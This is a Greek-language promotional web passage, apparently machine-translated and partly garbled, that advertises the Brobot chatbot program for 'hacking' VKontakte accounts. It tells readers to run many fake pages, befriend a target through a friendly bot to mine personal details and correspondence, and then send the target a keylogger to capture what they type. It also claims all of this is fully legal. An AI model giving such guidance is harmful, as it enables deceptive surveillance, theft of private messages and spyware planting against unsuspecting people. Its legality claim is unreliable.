Η χρήση του για hacking είναι, φυσικά, μια μάλλον περίεργη μέθοδος διαχείρισης αυτού του προγράμματος, αλλά κατ 'αρχήν, λειτουργικότητα εκεί είναι απαραίτητη και επαρκής για hacking.
Μπορούμε να «ρυθμίσουμε» το bot στον ίδιο τον χρήστη, στους φίλους του, χρησιμοποιώντας τη δυνατότητα προσθήκης φίλων και προσωπικής αλληλογραφίας. Ας συνδέσουμε το bot III για συνομιλίες, ρυθμίζοντας το στον πιο φιλικό τόνο. Και μετά από αυτό, μπορείτε ήδη να αποκομίσετε τα οφέλη, μαθαίνοντας πολλά ενδιαφέροντα πράγματα για τον χρήστη στο ιστορικό αλληλογραφίας που αποθήκευσε το Brobot.
Μετά από αυτό, μπορείτε να στείλετε στον χρήστη, για παράδειγμα, keylogger και συλλάβετε τι γράφει σε άλλους χρήστες- στην πραγματικότητα, δεν θα χρειαστεί να κατεβάσετε ειδικά προγράμματα για την παραβίαση του VKontakte μετά από αυτό. Θα αρκεί απλώς να ακολουθήσετε τον χρήστη. Ωστόσο, μπορείτε επίσης να κάνετε χωρίς keylogger!

Πώς μπορούν να μας βοηθήσουν τα προγράμματα hacking VKontakte όπως το Brobot;

Πρώτα απ 'όλα, ας ορίσουμε τι Το Brobot δεν χακάρει σελίδες. Όλες οι δραστηριότητές μας είναι απολύτως νόμιμες, κανείς δεν θα μπορεί να μας μηνύσει, κανείς δεν θα μπορεί να μας μπλοκάρει - όλα είναι απολύτως δίκαια (στο βαθμό που τα χρειαζόμαστε).
Απλώς, στην πραγματικότητα, ξεκινάμε πολλές σελίδες (Είναι καλύτερα να αγοράσετε απεριόριστα αμέσως, αυτό είναι εγγυημένο ότι θα αυξήσει τον όγκο των πληροφοριών που λαμβάνονται) και από αυτές επικοινωνούμε ήδη με τον χρήστη, ο οποίος μας επιτρέπει να γνωρίζουμε τη στάση του απέναντι σε μια ποικιλία προσωπικοτήτων, καθώς και να αποκτήσουμε ένα πορτρέτο του εαυτού του, των φίλων του, των συγγενών του και ούτω καθεξής - και αυτό είναι, στην ουσία, αυτό που χρειαζόμαστε.Και στο μέλλον, μπορείτε να κάνετε ακόμη πιο ενδιαφέρουσες και περίπλοκες ενέργειες, και εδώ όλα εξαρτώνται από τις επιθυμίες και τη φαντασία σας.
Το πρόγραμμα Brobot θα γίνει ο καλός σας βοηθός και η ομάδα υποστήριξης Brobot, διαθέσιμη σχεδόν όλο το εικοσιτετράωρο, θα απαντήσει σε όλες τις τεχνικές ερωτήσεις σας.